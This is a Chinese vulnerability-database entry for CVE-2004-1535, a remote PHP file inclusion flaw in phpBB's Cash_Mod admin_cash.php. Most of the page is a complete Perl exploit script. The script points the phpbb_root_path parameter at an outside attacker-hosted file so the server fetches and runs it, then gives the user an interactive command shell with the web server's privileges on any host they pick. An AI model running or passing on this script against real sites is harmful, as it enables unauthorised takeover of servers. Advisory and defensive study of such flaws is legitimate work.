phpBB Cash Mod module admin_cash.phpPHP远程文件列入漏洞
漏洞ID | 1108280 | 漏洞类型 | 未知 |
发布时间 | 2004-11-17 | 更新时间 | 2004-12-31 |
CVE编号 | CVE-2004-1535 |
CNNVD-ID | CNNVD-200412-499 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
phpBB中CashModmodule的admin_cash.php存在PHP远程文件列入漏洞。远程攻击者通过修改phpbb_root_path参数引用包含该代码的远程Web服务器上的URL,从而执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/11701/info
A vulnerability is reported to exist in the phpBB Cash_Mod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system.
Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.
#####################################################
# phpBB2.pl exploit 2004 http://securityfocus.com/bid/11701
# Spawn bash style Shell with webserver uid
# Greetz foxtwo, Zone-H
# This Script is actually under development
#####################################################
use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
$U[1] = "/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";
$U[2] = "/forum/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "nnnnnnnnnnnnnnnnnnnnnnnn";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
$output = $results[$X];
if (defined $output){
if ($output =~/IIS/){ $webserver = "apache" };
};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
}else{
print "nnOK";
};
};
sub scan {
my $status = "not_vulnerable";
print "nnnnnnnnnnnnnnnnnnnnnnnn";
print "Testing string ONE and TWO";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
$flag = "1";
$status = "vulnerable";
};
};
if ($flag eq "0") {
}else{
};
};
if ($status eq "not_vulnerable"){
};
};
sub choose {
print "nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "nHELP QUIT URL SCAN Or Command
n[$host]$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/s/+/g;
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "nSorry UNABLE TO CONNECT To $host On Port $port.n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.1rnHost: $hostrnrn";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1rnHost: $hostrnrn";
};
while ( <$connection> ) {
@results = <$connection>;
};
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
print "nOUTPUT FROM $host. nn";
my $display;
if ($probe eq "string") {
my $X;
for ($X=0; $X<=10; $X++) {
$display = $results[$X];
if (defined $display){print "$display";};
sleep 1;
};
}else{
foreach $display (@results){
print "$display";
sleep 1;
};
};
};
sub exit{
print "nnn
SPABAM 2004.";
print "nspabam.da.ru [email protected]";
print "nnn";
exit;
};
sub help {
print "nnnnnnnnnnnnnnnnnnnnnnnn";
print "n
PHPBB2.0 - 2.0.10
Command Execution Vulnerability by SPABAM 2004" ;
print "n
";
print "n phpBB2";
print "n
note.. ORP";
print "n";
print "n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "n Command: SCAN URL HELP QUIT";
print "nnnnnnnnnnn";
};
|受影响的产品
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Gr
|参考资料
来源:XF
名称:phpbb-admincashphp-file-include(18151)
链接:http://xforce.iss.net/xforce/xfdb/18151
来源:BUGTRAQ
名称:20041118Re:VulnerabilitiesinforumphpBB2withCash_Mod(allver.)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110082153702843&w;=2
来源:BUGTRAQ
名称:20041118VulnerabilitiesinforumphpBB2withCash_Mod(allver.)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110075903308817&w;=2
IIS代码注入漏洞 漏洞ID 1105300 漏洞类型 其他 发布时间 1997-02-20 更新时间 1999-12-31 CVE编号 CVE-1999-0154 CNNVD-ID CNNVD-199912-153 漏洞平台 Windows CVSS评分 5…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666